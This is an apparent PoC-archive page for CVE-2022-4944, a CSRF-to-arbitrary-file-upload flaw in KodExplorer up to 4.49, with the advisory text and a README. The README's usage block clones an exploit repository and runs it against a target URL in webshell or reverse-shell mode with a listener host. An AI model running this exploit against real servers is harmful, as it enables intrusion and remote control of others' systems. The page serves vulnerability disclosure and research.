Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%

CVE-2022-4944 PoC β€” kalcaddle KodExplorer cross-site request forgery

Source
Associated Vulnerability
Title:kalcaddle KodExplorer cross-site request forgery (CVE-2022-4944)
Description:A vulnerability, which was classified as problematic, has been found in kalcaddle KodExplorer up to 4.49. Affected by this issue is some unknown functionality. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.50 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227000.
Description
γ€ŒπŸ’₯」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
Readme
<h1 align="center">γ€ŒπŸ’₯」CVE-2022-4944</h1>

<p align="center"><img height="600" src="https://raw.githubusercontent.com/kalcaddle/static/master/images/kod/common2.png"></p>

## Description

A vulnerability, which was classified as problematic, was found in kalcaddle KodExplorer up to 4.49. This affects an unknown part. The manipulation leads to cross-site request forgery. This vulnerability is uniquely identified as CVE-2022-4944. It is possible to initiate the attack remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

## Demo

![demo](demo.png)

## Usage

```
pip install requests
git clone https://github.com/MrEmpy/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode
```

## Reference

* https://vuldb.com/?id.227000
* https://www.cve.org/CVERecord?id=CVE-2022-4944
File Snapshot

[4.0K] /data/pocs/39459b54e3d1c45a7c8d33b84519bea4840e6e79 β”œβ”€β”€ [3.7K] CVE-2022-4944.py β”œβ”€β”€ [1.0K] CVE-2022-4944.yaml β”œβ”€β”€ [213K] demo.png β”œβ”€β”€ [ 34K] LICENSE └── [ 922] README.md 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’